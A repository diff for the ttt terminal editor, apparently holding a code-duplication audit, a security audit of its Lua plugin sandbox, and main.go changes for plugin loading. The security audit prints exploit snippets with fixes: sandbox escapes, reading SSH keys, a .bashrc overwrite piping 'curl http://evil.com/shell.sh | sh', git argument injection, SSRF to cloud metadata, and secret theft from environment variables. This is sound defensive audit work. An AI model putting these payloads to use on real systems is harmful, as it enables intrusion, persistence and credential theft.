+  - `internal/plugin/lua_panel.go:326-352` (`panelListWidget`)
+- **Pattern**: Both parse the same fields from Lua tables: `items`, `on_select`, `on_command`, `node_menu`, `key_commands`. The List version is just Tree without `indent` and `on_expand`.
+  ```go
+  // Both have:
+  if items, ok := L.GetField(tbl, "items").(*lua.LTable); ok { desc.Items = ... }
+  if fn, ok := L.GetField(tbl, "on_select").(*lua.LFunction); ok { desc.OnSelect = fn }
+  if fn, ok := L.GetField(tbl, "on_command").(*lua.LFunction); ok { desc.OnCommand = fn }
+  if menu, ok := L.GetField(tbl, "node_menu").(*lua.LTable); ok { desc.NodeMenu = ... }
+  if kc, ok := L.GetField(tbl, "key_commands").(*lua.LTable); ok { desc.KeyCommands = ... }
+  ```
+- **Occurrences**: 2 (Tree and List parsers)
+- **Suggestion**: Extract a `parseTreeListCommon(L, tbl, desc)` helper and call it from both. The Tree parser would additionally parse `indent` and `on_expand`.
+
+### 8. VStack/HStack/ScrollView/Box container parsers share `render` + `collectChildren` extraction
+
+- **Locations**:
+  - `internal/plugin/lua_panel.go:471-488` (`panelVStackWidget`)
+  - `internal/plugin/lua_panel.go:491-512` (`panelHStackWidget`)
+  - `internal/plugin/lua_panel.go:525-540` (`panelScrollViewWidget`)
+  - `internal/plugin/lua_panel.go:542-576` (`panelBoxWidget`)
+- **Pattern**: All four start with the same child-collection block:
+  ```go
+  tbl := L.CheckTable(2)
+  desc := WidgetDesc{}
+  if fn, ok := L.GetField(tbl, "render").(*lua.LFunction); ok {
+      desc.Children = collectChildren(L, proxy, fn)
+  }
+  ```
+  Then each adds its own specific fields (`gap`, `height`, `border`, etc.).
+- **Occurrences**: 4 times
+- **Suggestion**: Extract a `parseContainerBase(L, proxy, tbl) WidgetDesc` helper that handles `render` -> `collectChildren`, and optionally `gap` / `height`. Each widget parser then extends the base desc.
+
+### 9. `SetEditorAPI` / `SetFilesystemAPI` / `SetSystemAPI` / `SetNetworkAPI` / `SetLogFactory` boilerplate
+
+- **Locations**:
+  - `internal/plugin/manager.go:153-181` (5 methods)
+- **Pattern**: Five consecutive methods follow the exact same pattern:
+  ```go
+  func (m *Manager) SetXxxAPI(api XxxAPI) {
+      for _, p := range m.plugins {
+          p.Xxx = api
+      }
+  }
+  ```
+- **Occurrences**: 5 methods (4 API setters + 1 log factory setter)
+- **Suggestion**: Replace with a single `ForEachPlugin(fn func(*Plugin))` method, or consolidate all APIs into a single `PluginHost` struct that gets assigned once. The current approach means adding a new API domain requires adding yet another `Set*API` method + Manager method. However, the current code is only 30 lines total and each method is trivially simple, so this is moderate impact.
+
+### 10. Lua plugin `last_panel` + `initialized` + lazy-init-on-first-render pattern
+
+- **Locations**:
+  - `plugins/go-test-runner/plugin.lua:14,13,406-411`
+  - `plugins/todo-scanner/plugin.lua:10,8,191-196`
+  - `plugins/docker-manager/init.lua:204,9,281-285`
+  - `plugins/cheat-sheet/plugin.lua:11,149`
+  - `plugins/http-client/plugin.lua:62,69`
+  - `plugins/notepad/plugin.lua:111,226`
+- **Pattern**: Every sidebar/bottom plugin repeats the same boilerplate:
+  ```lua
+  local last_panel = nil
+  local initialized = false
+  -- ...
+  render = function(panel)
+      last_panel = panel
+      if not initialized then
+          initialized = true
+          do_initial_work(panel)
+      end
+      -- ...
+  end
+  ```
+  This is 6-8 lines of boilerplate per plugin, plus every command handler needs to reference `last_panel` for `panel:redraw()`.
+- **Occurrences**: 6 plugins (all panel-based plugins)
+- **Suggestion**: The plugin framework could support `on_init` and `on_activate` lifecycle callbacks that run once automatically. The panel reference could be stored on the plugin object itself, eliminating the need for a global `last_panel`. Alternatively, provide a Lua utility module (`ttt.utils`) with a `lazy_init(fn)` pattern, but lifecycle callbacks would be cleaner.
+
+### 11. Notepad plugin rolls its own JSON encoder/decoder (106 lines)
+
+- **Locations**:
+  - `plugins/notepad/plugin.lua:8-105` (`json_escape`, `json_encode`, `json_decode`)
+- **Pattern**: A complete hand-written JSON parser/serializer in Lua. Any plugin that needs to persist structured data would need to duplicate this or copy it.
+- **Occurrences**: 1 currently, but will grow as more plugins need data persistence
+- **Suggestion**: Provide a built-in `ttt.json` module (backed by Go's `encoding/json`) that plugins can `require("ttt.json")` to encode/decode Lua tables. This would eliminate 100+ lines from the notepad plugin and prevent future plugins from reimplementing JSON parsing. Go already has a robust JSON implementation -- there is no reason for each Lua plugin to reimplement it.
+
+## Low Impact / Acceptable Duplication
+
+### 12. Focusable/SetFocused/IsFocused 3-line boilerplate on every focusable widget
+
+- **Locations**: `tree.go:79-81`, `input.go:57-59`, `button.go:57-59`, `scrollview.go:155-157`, `checkbox.go:28-30`, `tabs.go:48-55`, `select_widget.go:126-128`, `panel_widget.go:82-84`, plus `ui/` widgets (terminal_widget, references_widget, problems_widget, search_widget, etc.)
+- **Pattern**:
+  ```go
+  func (x *Widget) Focusable() bool        { return true }
+  func (x *Widget) SetFocused(f bool)       { x.focused = f }
+  func (x *Widget) IsFocused() bool         { return x.focused }
+  ```
+- **Occurrences**: ~10 widget types in `internal/widgets/` + ~15 in `internal/ui/`
+- **Suggestion**: Could be consolidated by embedding a `FocusableBase` struct that provides the default implementation. However, the 3-line boilerplate is idiomatic Go (interface methods on concrete types), some widgets override with custom behavior (e.g., `TabsWidget.SetFocused` does more), and embedding would add structural coupling. **Acceptable duplication** -- the Go language design makes this the expected pattern.
+
+### 13. `Height() int { return 0 }` / `Width() int { return 0 }` grow-to-fill defaults
+
+- **Locations**: `vstack.go:32`, `hstack.go:25`, `scrollview.go:22-23`, `tree.go:77-78`, `panel_widget.go:28-29`
+- **Pattern**: Multiple widget types return 0 from Height/Width to signal "grow to fill available space."
+- **Occurrences**: ~8 widget types
+- **Suggestion**: `BaseWidget` could provide default `Height() int { return 0 }` and `Width() int { return 0 }` methods, eliminating the need for widgets to declare them explicitly. However, since many widgets override one or both with non-zero values, the savings would be minimal. **Acceptable duplication**.
+
+### 14. HandleEvent delegation pattern in container widgets
+
+- **Locations**:
+  - `internal/widgets/vstack.go:153-160`
+  - `internal/widgets/hstack.go:107-114`
+  - `internal/widgets/box.go:93-98`
+- **Pattern**:
+  ```go
+  func (v *VStackWidget) HandleEvent(ev tcell.Event) EventResult {
+      for _, child := range v.Children {
+          if child.HandleEvent(ev) == EventConsumed { return EventConsumed }
+      }
+      return EventIgnored
+  }
+  ```
+- **Occurrences**: 3 container types
+- **Suggestion**: Could extract a `delegateEvent(children []Widget, ev)` helper. However, each container may evolve to handle events differently (e.g., Box might add click-to-focus), and the function is only 5 lines. **Acceptable duplication**.
+
+### 15. `createTreeWidget` and `createListWidget` are nearly identical
+
+- **Locations**:
+  - `internal/plugin/widget_builder.go:230-237` (`createTreeWidget`)
+  - `internal/plugin/widget_builder.go:240-246` (`createListWidget`)
+- **Pattern**: Both create a `TreeWidget` with a `TreeConfig`, the only difference being that Tree passes `Indent: desc.Indent` while List does not.
+- **Occurrences**: 2
+- **Suggestion**: Could be a single function with a `useIndent bool` parameter. However, keeping them separate makes the code more readable and allows them to diverge if List and Tree gain different behaviors. **Acceptable duplication**.
+
+### 16. Docker plugin `cmd_prune_*` handlers follow identical confirm-exec-refresh pattern
+
+- **Locations**:
+  - `plugins/docker-manager/init.lua:210-222` (`cmd_prune_containers`)
+  - `plugins/docker-manager/init.lua:224-236` (`cmd_prune_images`)
+  - `plugins/docker-manager/init.lua:238-250` (`cmd_prune_volumes`)
+- **Pattern**:
+  ```lua
+  local function cmd_prune_X()
+    ttt.confirm("Prune all ... ?", function()
+      ttt.log("info", "pruning ...")
+      sys.exec_async("docker", {"X", "prune", "-f"}, function(result)
+        if result.exit_code == 0 then ttt.log("info", "... prune: ok")
+        else ttt.log("error", "... prune: " .. result.stderr) end
+        refresh_X(last_panel)
+      end)
+    end)
+  end
+  ```
+- **Occurrences**: 3 in one plugin
+- **Suggestion**: Could extract a generic `prune(resource, args, refresh_fn)` helper within the plugin. Low priority since it is contained within a single plugin file.
+
+### 17. Docker plugin `container_items` / `image_items` / `volume_items` follow the same list-building pattern
+
+- **Locations**:
+  - `plugins/docker-manager/init.lua:150-171`
+  - `plugins/docker-manager/init.lua:173-186`
+  - `plugins/docker-manager/init.lua:188-201`
+- **Pattern**: Each builds a list of items from a data table using the same loop structure.
+- **Occurrences**: 3 in one plugin
+- **Suggestion**: Plugin-internal concern. Could use a generic mapper function but the structures differ enough that forced abstraction would reduce readability. **Acceptable duplication**.
+
+### 18. Docker plugin `refresh_containers` / `refresh_images` / `refresh_volumes` follow the same fetch-parse-store pattern
+
+- **Locations**:
+  - `plugins/docker-manager/init.lua:22-42`
+  - `plugins/docker-manager/init.lua:44-61`
+  - `plugins/docker-manager/init.lua:63-80`
+- **Pattern**: Each calls `sys.exec_async("docker", ...)`, parses the output line by line, and stores results in a module-level table.
+- **Occurrences**: 3 in one plugin
+- **Suggestion**: Plugin-internal concern. The parsing differs per resource type. **Acceptable duplication**.
+
+### 19. Editor API getter functions follow a uniform closure-nil-check-push pattern
+
+- **Locations**: `internal/plugin/lua_editor.go:41-158` (9 read-only getter functions)
+- **Pattern**: Each getter follows:
+  ```go
+  func editorXxx(p *Plugin) lua.LGFunction {
+      return func(L *lua.LState) int {
+          if p.Editor == nil { L.Push(fallbackValue); return 1 }
+          L.Push(lua.LString(p.Editor.Xxx()))
+          return 1
+      }
+  }
+  ```
+  The 6 simple string getters (`BufferText`, `CurrentLine`, `FilePath`, `FileName`, `Language`, `SelectionText`) are completely interchangeable modulo the method name.
+- **Occurrences**: 6 identical-shaped simple getters
+- **Suggestion**: A `stringGetter(p *Plugin, get func(EditorAPI) string) lua.LGFunction` helper would reduce each to a one-liner. However, the current code is clear and each function is only ~8 lines. **Low impact**.

--- a/audit/security.md
+++ b/audit/security.md
@@ -1,0 +1,370 @@
+# Security Audit: ttt Plugin Sandbox
+
+Audited: 2026-06-27
+Scope: `internal/plugin/`, `internal/app/plugin_api.go`, `internal/app/commands_plugin.go`, `cmd/ttt/main.go`
+
+---
+
+## Critical (sandbox escape / data loss possible)
+
+### C1. `load()` function enables arbitrary code execution
+
+- **File**: `internal/plugin/sandbox.go:64`
+- **Vulnerability**: The sandbox removes `dofile` and `loadfile` but leaves the `load()` builtin available (registered by `lua.OpenBase`). In gopher-lua, `load()` takes a reader function and compiles/executes arbitrary Lua code at runtime. A plugin can construct and execute any Lua code from strings, which defeats the purpose of a static module allowlist.
+- **Exploit**:
+```lua
+-- Dynamically compile and execute arbitrary code
+local code = 'print("sandbox escaped")'
+local done = false
+local fn = load(function()
+    if not done then done = true; return code end
+    return nil
+end)
+fn()
+```
+- **Fix**: Remove `load` from the global table after opening the base library:
+```go
+for _, name := range []string{"dofile", "loadfile", "load"} {
+    L.SetGlobal(name, lua.LNil)
+}
+```
+
+### C2. `package.loaders` bypass lets plugins load arbitrary `.lua` files from the filesystem
+
+- **File**: `internal/plugin/sandbox.go:52-53` (OpenPackage loaded), `sandbox.go:327-337` (require wrapper)
+- **Vulnerability**: The sandbox wraps `require` to restrict module loading to the allowlist. However, `lua.OpenPackage` is loaded, which registers `package.loaders` (an array of loader functions) and `package.path`. A plugin can directly call `package.loaders[2]` (the filesystem loader) with any module name after setting `package.path` to an arbitrary location. This completely bypasses the `require` wrapper and allows loading and executing any `.lua` file on the filesystem.
+- **Exploit**:
+```lua
+-- Bypass require restriction entirely
+package.path = "/home/victim/.config/ttt/plugins/malicious/?.lua;/tmp/?.lua"
+local loader = package.loaders[2]
+local fn = loader("payload")  -- loads /tmp/payload.lua
+if type(fn) == "function" then fn() end
+```
+- **Fix**: After setting up the require wrapper, remove `package.loaders`, `package.path`, `package.cpath`, and the `package` global entirely. Only keep the preload mechanism for the allowed modules:
+```go
+L.SetGlobal("package", lua.LNil)
+```
+Or, more surgically, remove the filesystem loader from `package.loaders` and clear `package.path`:
+```go
+pkg := L.GetGlobal("package")
+if tbl, ok := pkg.(*lua.LTable); ok {
+    L.SetField(tbl, "path", lua.LString(""))
+    L.SetField(tbl, "cpath", lua.LString(""))
+    loaders := L.GetField(tbl, "loaders")
+    if lt, ok := loaders.(*lua.LTable); ok {
+        // Keep only the preload loader (index 1), remove filesystem loader (index 2)
+        lt.RawSetInt(2, lua.LNil)
+    }
+}
+```
+
+### C3. Filesystem API has zero path restrictions -- plugins can read/write any file the user can access
+
+- **File**: `internal/app/plugin_api.go:197-224`
+- **Vulnerability**: `PluginFilesystemAPI.ReadFile()` and `WriteFile()` pass the plugin-provided path directly to `os.ReadFile()` / `os.WriteFile()` with no path validation, sandboxing, or scoping. A plugin granted `fs.read` can read `/etc/shadow`, `~/.ssh/id_rsa`, `~/.gnupg/`, etc. A plugin with `fs.write` can overwrite `~/.bashrc`, `~/.ssh/authorized_keys`, or any other file.
+- **Exploit**:
+```lua
+local fs = require("ttt.fs")
+-- Steal SSH keys
+local key = fs.read(os.getenv("HOME") .. "/.ssh/id_rsa")
+-- Or overwrite .bashrc to establish persistence
+fs.write(os.getenv("HOME") .. "/.bashrc", "curl http://evil.com/shell.sh | sh")
+```
+- **Fix**: Scope filesystem access to the workspace directories and the plugin's own directory. Reject paths containing `..` after resolution, and validate that the resolved absolute path is within an allowed prefix:
+```go
+func (f *PluginFilesystemAPI) ReadFile(path string) (string, error) {
+    absPath, err := filepath.Abs(path)
+    if err != nil {
+        return "", err
+    }
+    if !f.isAllowedPath(absPath) {
+        return "", fmt.Errorf("access denied: path outside allowed directories")
+    }
+    // ...
+}
+```
+
+### C4. Command injection via allowed binary arguments
+
+- **File**: `internal/plugin/lua_system.go:32-68`, `internal/app/plugin_api.go:233-247`
+- **Vulnerability**: The `system.exec` permission grants access to specific binary names (e.g., `["git", "rg"]`). While the binary name is checked against the allowlist, the arguments are passed through without any validation. Many common binaries can be weaponized via arguments to execute arbitrary commands. `exec.Command` avoids shell injection, but the binaries themselves provide escape hatches.
+- **Exploit** (if `git` is in the allowlist):
+```lua
+local sys = require("ttt.system")
+-- git can execute arbitrary commands via aliases or hooks
+sys.exec("git", {"-c", "protocol.ext.allow=always",
+    "clone", "ext::sh -c 'id > /tmp/pwned'%20//remote"})
+-- Or via core.fsmonitor
+sys.exec("git", {"-c", "core.fsmonitor=!touch /tmp/pwned", "status"})
+```
+- **Exploit** (if `rg` is in the allowlist):
+```lua
+-- rg can read any file, bypassing fs.read permission
+local result = sys.exec("rg", {"", "/etc/passwd"})
+```
+- **Fix**: Consider argument validation or a deny-list of dangerous flags for each allowed binary. Alternatively, provide higher-level wrappers (e.g., a `git` API) instead of raw exec access. At minimum, document that `system.exec` is equivalent to full shell access for the allowed binaries.
+
+---
+
+## High (permission bypass / unauthorized access)
+
+### H1. Path traversal in manifest `entry` field
+
+- **File**: `internal/plugin/plugin.go:77-78`, `internal/plugin/manifest.go:19-39`
+- **Vulnerability**: The manifest's `entry` field is joined with the plugin directory using `filepath.Join(p.Dir, p.Manifest.Entry)` without validating that the result stays within the plugin directory. A malicious plugin manifest can use `../` to point to arbitrary files on the filesystem.
+- **Exploit**: A malicious plugin's `plugin.ttt.json`:
+```json
+{
+    "name": "innocent-plugin",
+    "entry": "../../../.local/share/ttt/data.lua",
+    "permissions": {}
+}
+```
+This would cause `DoFile` to execute any `.lua` file on the system. While parsing non-Lua files would fail, error messages could leak file contents, and valid Lua files elsewhere on the system would be executed.
+- **Fix**: Validate that the resolved entry path is within the plugin directory:
+```go
+entry := filepath.Join(p.Dir, p.Manifest.Entry)
+absEntry, _ := filepath.Abs(entry)
+absDir, _ := filepath.Abs(p.Dir)
+if !strings.HasPrefix(absEntry, absDir+string(filepath.Separator)) {
+    return fmt.Errorf("entry path escapes plugin directory")
+}
+```
+
+### H2. No SSRF protection in network API
+
+- **File**: `internal/app/plugin_api.go:264-310`
+- **Vulnerability**: The HTTP client has no restrictions on target URLs. A plugin with `network.http` permission can make requests to `localhost`, internal network addresses (`10.x.x.x`, `172.16.x.x`, `192.168.x.x`), cloud metadata endpoints (`169.254.169.254`), and `file://` URLs.
+- **Exploit**:
+```lua
+local net = require("ttt.net")
+-- Access cloud metadata (AWS/GCP/Azure)
+local r = net.get("http://169.254.169.254/latest/meta-data/iam/security-credentials/")
+-- Scan internal network
+local r2 = net.get("http://192.168.1.1/admin")
+-- Access local services
+local r3 = net.get("http://localhost:6379/")
+```
+- **Fix**: Add URL validation to reject private/reserved IP ranges, localhost, and non-HTTP(S) schemes. Consider using a custom `http.Transport` with a `DialContext` that resolves DNS and checks the IP before connecting (to prevent DNS rebinding).
+
+### H3. Unbounded HTTP response body -- denial of service
+
+- **File**: `internal/app/plugin_api.go:280` (`io.ReadAll(resp.Body)`)
+- **Vulnerability**: The `Get` and `Post` methods use `io.ReadAll` on the response body with no size limit. A malicious or compromised server can send a multi-gigabyte response, exhausting memory and crashing the editor.
+- **Exploit**:
+```lua
+local net = require("ttt.net")
+-- Point to a server that streams infinite data
+net.get("http://evil.com/infinite-stream")
+```
+- **Fix**: Use `io.LimitReader` to cap response body size:
+```go
+body, err := io.ReadAll(io.LimitReader(resp.Body, 10*1024*1024)) // 10MB max
+```
+
+### H4. Environment variable access is completely unscoped
+
+- **File**: `internal/app/plugin_api.go:249-251`, `internal/plugin/lua_system.go:122-132`
+- **Vulnerability**: The `system.env` permission grants access to ALL environment variables via `os.Getenv()`. This can leak sensitive secrets like `AWS_SECRET_ACCESS_KEY`, `DATABASE_URL`, `GITHUB_TOKEN`, API keys, etc.
+- **Exploit**:
+```lua
+local sys = require("ttt.system")
+local aws_key = sys.env("AWS_SECRET_ACCESS_KEY")
+local gh_token = sys.env("GITHUB_TOKEN")
+local db_url = sys.env("DATABASE_URL")
+-- Exfiltrate via network if network.http is also granted
+```
+- **Fix**: Either scope `system.env` to a specific list of allowed variable names (declared in the manifest), or add a deny-list of known sensitive variable patterns (`*KEY*`, `*SECRET*`, `*TOKEN*`, `*PASSWORD*`).
+
+### H5. Plugin install via `git clone` with user-supplied URL -- limited validation
+
+- **File**: `internal/plugin/manager.go:203-231`
+- **Vulnerability**: The `Install` function accepts a user-provided URL and passes it directly to `git clone`. While `exec.Command` prevents shell injection, git itself supports various URL schemes including `file://`, SSH, and custom protocols. The plugin name is derived from `filepath.Base(repoURL)` which could be crafted. Additionally, a cloned repository's `hooks/` directory could contain executable hooks that git might run during subsequent `git pull` operations (used in `Update`).
+- **Fix**: Validate that the URL uses `https://` scheme only. Sanitize the derived name to allow only alphanumeric characters, hyphens, and underscores.
+
+---
+
+## Medium (defense in depth gaps)
+
+### M1. `getfenv` / `setfenv` allow function environment manipulation
+
+- **File**: `internal/plugin/sandbox.go:54` (OpenBase loaded, which includes getfenv/setfenv)
+- **Vulnerability**: `getfenv()` and `setfenv()` allow inspecting and replacing the environment of any function. A plugin can use these to inspect the internal state of sandbox wrapper functions or modify their behavior.
+- **Exploit**:
+```lua
+-- Inspect the require wrapper's environment
+local env = getfenv(require)
+-- Potentially find the original require or other internals
+for k, v in pairs(env) do
+    print(k, type(v))
+end
+```
+- **Fix**: Remove `getfenv` and `setfenv` from globals:
+```go
+for _, name := range []string{"dofile", "loadfile", "load", "getfenv", "setfenv"} {
+    L.SetGlobal(name, lua.LNil)
+}
+```
+
+### M2. `rawset` / `rawget` allow bypassing metatables
+
+- **File**: `internal/plugin/sandbox.go:54` (OpenBase includes rawset/rawget)
+- **Vulnerability**: `rawset` allows a plugin to modify any table directly, bypassing `__newindex` metamethods that might be used for access control. A plugin can inject functions into the global table.
+- **Exploit**:
+```lua
+-- Inject a global that other plugins might use
+rawset(_G, "evil_hook", function() return "injected" end)
+```
+- **Impact**: Each plugin has its own Lua VM, so cross-plugin contamination is not possible. However, `rawset` could be used to modify internal sandbox tables if any access-control metatables were added in the future. Currently low risk due to per-plugin isolation.
+- **Fix**: Consider removing `rawset` and `rawget` if they are not needed by plugins.
+
+### M3. No execution timeout -- infinite loops freeze the editor
+
+- **File**: `internal/plugin/sandbox.go:47`, `internal/plugin/plugin.go:78`
+- **Vulnerability**: The Lua VM has no execution timeout or instruction count limit. A plugin (malicious or buggy) can enter an infinite loop during `Init()`, `render()`, or any callback, which will block the editor's main goroutine and freeze the UI permanently.
+- **Exploit**:
+```lua
+-- In init or any callback
+while true do end
+```
+- **Fix**: gopher-lua supports context cancellation. Create a context with timeout and use `L.SetContext()`:
+```go
+ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+defer cancel()
+L.SetContext(ctx)
+```
+For render callbacks, use a shorter timeout (e.g., 100ms). For async operations, use longer timeouts.
+
+### M4. No memory limits -- unbounded allocation
+
+- **File**: `internal/plugin/sandbox.go:47`
+- **Vulnerability**: The Lua VM is created with default options and no memory limit. A plugin can allocate unbounded memory via large strings, tables, or recursive data structures, eventually causing the editor process to be OOM-killed.
+- **Exploit**:
+```lua
+local t = {}
+for i = 1, math.huge do
+    t[i] = string.rep("A", 1024 * 1024) -- 1MB strings
+end
+```
+- **Fix**: gopher-lua's `Options` struct supports `RegistryMaxSize` to cap the data stack. Consider setting reasonable limits. For memory, Go does not provide per-goroutine memory limits, but a watchdog goroutine could periodically check `runtime.MemStats` and kill runaway plugins.
+
+### M5. Async callback crash when plugin is destroyed mid-flight
+
+- **File**: `internal/plugin/lua_system.go:94-107`, `internal/plugin/lua_net.go:117-118`
+- **Vulnerability**: In `sysExecAsync`, the `resultFn` closure accesses `p.State.NewTable()` without checking if `p.State` is nil. If a plugin is destroyed (via uninstall, disable, or reload) while an async operation is in flight, the callback will be delivered to the event loop and call `p.State.NewTable()` on a nil pointer, causing a panic that crashes the editor.
+- **Exploit**: Install a plugin that starts a long-running async exec, then immediately uninstall it.
+- **Fix**: Add nil checks at the start of every `resultFn`:
+```go
+resultFn := func() {
+    if p.State == nil {
+        return
+    }
+    tbl := p.State.NewTable()
+    // ...
+}
+```
+
+### M6. No limit on concurrent async operations
+
+- **File**: `internal/plugin/lua_system.go:91`, `internal/plugin/lua_net.go:114,149`
+- **Vulnerability**: A plugin can spawn unlimited concurrent goroutines via `exec_async`, `get_async`, and `post_async`. Each goroutine holds resources (memory, OS threads for exec, TCP connections for HTTP).
+- **Exploit**:
+```lua
+local sys = require("ttt.system")
+for i = 1, 10000 do
+    sys.exec_async("sleep", {"3600"}, function() end)
+end
+```
+This spawns 10,000 goroutines, each waiting on a `sleep` process, exhausting PIDs and file descriptors.
+- **Fix**: Add a per-plugin semaphore or counter to limit concurrent async operations (e.g., max 10).
+
+### M7. `print` writes to stdout, potentially corrupting terminal state
+
+- **File**: `internal/plugin/sandbox.go:54` (OpenBase includes print)
+- **Vulnerability**: The `print` function writes directly to stdout. In a TUI application using tcell, unexpected stdout writes can corrupt the terminal display or interfere with the rendering pipeline.
+- **Fix**: Override `print` to route through the plugin's logging system:
+```go
+L.SetGlobal("print", L.NewFunction(func(L *lua.LState) int {
+    // Route to plugin log
+    msg := L.CheckString(1)
+    if p.Log != nil {
+        p.Log("info", msg)
+    }
+    return 0
+}))
+```
+
+---
+
+## Informational (hardening recommendations)
+
+### I1. Plugin keybinding hijacking
+
+- **File**: `internal/app/commands_plugin.go:405-429`
+- **Vulnerability**: Plugins with the `keybindings` permission can register global keybindings that override existing editor keybindings. A malicious plugin could rebind `ctrl+s` to execute a destructive action instead of saving.
+- **Recommendation**: Maintain a set of protected keybindings that plugins cannot override (save, quit, undo, etc.). Warn the user if a plugin attempts to bind a key that conflicts with an existing binding.
+
+### I2. Plugin command ID collisions
+
+- **File**: `internal/app/commands_plugin.go:391-403`
+- **Vulnerability**: Plugins register commands with arbitrary IDs. A malicious plugin could register a command with the same ID as a built-in command (e.g., `editor.save`), potentially replacing it.
+- **Recommendation**: Namespace plugin commands (e.g., `plugin.<name>.<id>`) and reject IDs that conflict with built-in commands.
+
+### I3. No content-type validation on HTTP responses
+
+- **File**: `internal/app/plugin_api.go:264-310`
+- **Vulnerability**: The network API returns the full response body as a string regardless of content type. Binary responses (images, archives) could consume large amounts of memory when converted to string.
+- **Recommendation**: Add optional content-type filtering and binary detection.
+
+### I4. Registry file permissions
+
+- **File**: `internal/plugin/registry.go:44`
+- **Vulnerability**: The plugin registry (`plugins.ttt.json`) is written with `0644` permissions. If other users on the system can read this file, they can see which plugins are installed and their permission grants. This is low risk on single-user systems.
+- **Recommendation**: Use `0600` for the registry file.
+
+### I5. No cryptographic verification of plugins
+
+- **File**: `internal/plugin/manager.go:203-231`
+- **Vulnerability**: Plugins are installed via `git clone` with no signature verification, checksum validation, or integrity checking. A MITM attack on the git connection (if using HTTP) could inject malicious code.
+- **Recommendation**: Require HTTPS for git clone URLs. Consider adding manifest signature verification or a plugin registry with checksums.
+
+### I6. `string.rep` can be used for memory exhaustion
+
+- **File**: `internal/plugin/sandbox.go:58` (string library loaded)
+- **Vulnerability**: `string.rep("A", 2^30)` will attempt to allocate a 1GB string. While this is a subset of M4 (no memory limits), `string.rep` is the most direct vector.
+- **Recommendation**: This is addressed by the memory limit recommendation in M4.
+
+### I7. Each plugin gets a separate Lua VM (positive finding)
+
+- **File**: `internal/plugin/plugin.go:69`
+- **Finding**: Each plugin has its own `lua.LState`, providing strong cross-plugin isolation. One plugin cannot access another plugin's Lua state, variables, or callbacks. This is a good security property.
+
+### I8. `Protect: true` prevents Lua panics from crashing Go (positive finding)
+
+- **File**: `internal/plugin/lua_callbacks.go:15`, `internal/plugin/plugin.go:152`
+- **Finding**: All `CallByParam` invocations use `Protect: true`, which converts Lua runtime errors into Go errors instead of panics. This prevents most Lua errors from crashing the editor. (But see M5 for the async nil-state gap.)
+
+---
+
+## Summary of severity counts
+
+| Severity | Count |
+|----------|-------|
+| Critical | 4 |
+| High | 5 |
+| Medium | 7 |
+| Informational | 8 |
+
+## Priority remediation order
+
+1. **C2** (package.loaders bypass) -- trivial fix, complete sandbox escape
+2. **C1** (`load()` available) -- trivial fix, enables dynamic code execution
+3. **C3** (filesystem unrestricted) -- moderate fix, data loss/theft risk
+4. **C4** (command injection via args) -- design-level fix, requires arg validation
+5. **M5** (async nil-state crash) -- trivial fix, editor crash
+6. **H1** (path traversal in entry) -- trivial fix, code execution
+7. **M3** (no execution timeout) -- moderate fix, editor freeze
+8. **H3** (unbounded response) -- trivial fix, memory DoS
+9. **H2** (SSRF) -- moderate fix, network attack
+10. **H4** (env var leakage) -- moderate fix, secret exfiltration

--- a/cmd/ttt/main.go
+++ b/cmd/ttt/main.go
@@ -8,14 +8,18 @@ import (
 	"runtime/debug"
 	"time"
 
+	"path/filepath"
+
 	"github.com/eugenioenko/ttt/internal/app"
 	"github.com/eugenioenko/ttt/internal/command"
 	"github.com/eugenioenko/ttt/internal/config"
 	"github.com/eugenioenko/ttt/internal/core/clipboard"
 	"github.com/eugenioenko/ttt/internal/github"
 	"github.com/eugenioenko/ttt/internal/lsp"
+	"github.com/eugenioenko/ttt/internal/plugin"
 	"github.com/eugenioenko/ttt/internal/render"
 	"github.com/eugenioenko/ttt/internal/term"
+	"github.com/eugenioenko/ttt/internal/ui"
 )
 
 var (
@@ -147,6 +151,19 @@ Docs: https://tttedit.dev
 	editor.Running = &running
 	app.RegisterCommands(editor)
 	app.BindKeys(editor.Root, cmdRegistry, cfg.Keybindings)
+
+	pluginsDir := filepath.Join(filepath.Dir(config.ConfigFilePath("plugins.ttt.json")), "plugins")
+	pluginManager := plugin.NewManager(pluginsDir)
+	pendingApprovals := pluginManager.LoadAll()
+	editor.PluginManager = pluginManager
+	defer pluginManager.Shutdown()
+
+	for _, reg := range pluginManager.SidebarPanels {
+		editor.Sidebar.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+	}
+	if len(pendingApprovals) > 0 {
+		editor.PendingPluginApprovals = pendingApprovals
+	}
 
 	if len(prURLs) > 0 {
 		if !github.IsGHInstalled() {

--- a/cmd/ttt/main.go
+++ b/cmd/ttt/main.go
@@ -179,6 +179,17 @@ Docs: https://tttedit.dev
 			screen.PostEvent(tcell.NewEventInterrupt(result))
 		}
 	}
+	pluginManager.SetLogFactory(func(pluginName string) func(string, string) {
+		return func(level, message string) {
+			editor.Output.AddLine(ui.OutputLine{
+				Time:       time.Now().Format("15:04:05"),
+				PluginName: pluginName,
+				Level:      level,
+				Message:    message,
+			})
+			screen.PostEvent(tcell.NewEventInterrupt(nil))
+		}
+	})
 
 	editor.RegisterStartupPluginCommands()
 

--- a/cmd/ttt/main.go
+++ b/cmd/ttt/main.go
@@ -155,7 +155,8 @@ Docs: https://tttedit.dev
 	app.BindKeys(editor.Root, cmdRegistry, cfg.Keybindings)
 
 	pluginsDir := filepath.Join(filepath.Dir(config.ConfigFilePath("plugins.ttt.json")), "plugins")
-	pluginManager := plugin.NewManager(pluginsDir)
+	localPluginsDir := filepath.Join(editor.Workspace.Primary(), "plugins")
+	pluginManager := plugin.NewManager(pluginsDir, localPluginsDir)
 	pendingApprovals := pluginManager.LoadAll()
 	editor.PluginManager = pluginManager
 	defer pluginManager.Shutdown()

--- a/cmd/ttt/main.go
+++ b/cmd/ttt/main.go
@@ -20,6 +20,8 @@ import (
 	"github.com/eugenioenko/ttt/internal/render"
 	"github.com/eugenioenko/ttt/internal/term"
 	"github.com/eugenioenko/ttt/internal/ui"
+
+	"github.com/gdamore/tcell/v2"
 )
 
 var (
@@ -160,6 +162,14 @@ Docs: https://tttedit.dev
 
 	for _, reg := range pluginManager.SidebarPanels {
 		editor.Sidebar.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+	}
+	for _, reg := range pluginManager.BottomPanels {
+		editor.BottomPanel.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+	}
+	for _, p := range pluginManager.Plugins() {
+		p.RequestRedraw = func() {
+			screen.PostEvent(tcell.NewEventInterrupt(nil))
+		}
 	}
 	if len(pendingApprovals) > 0 {
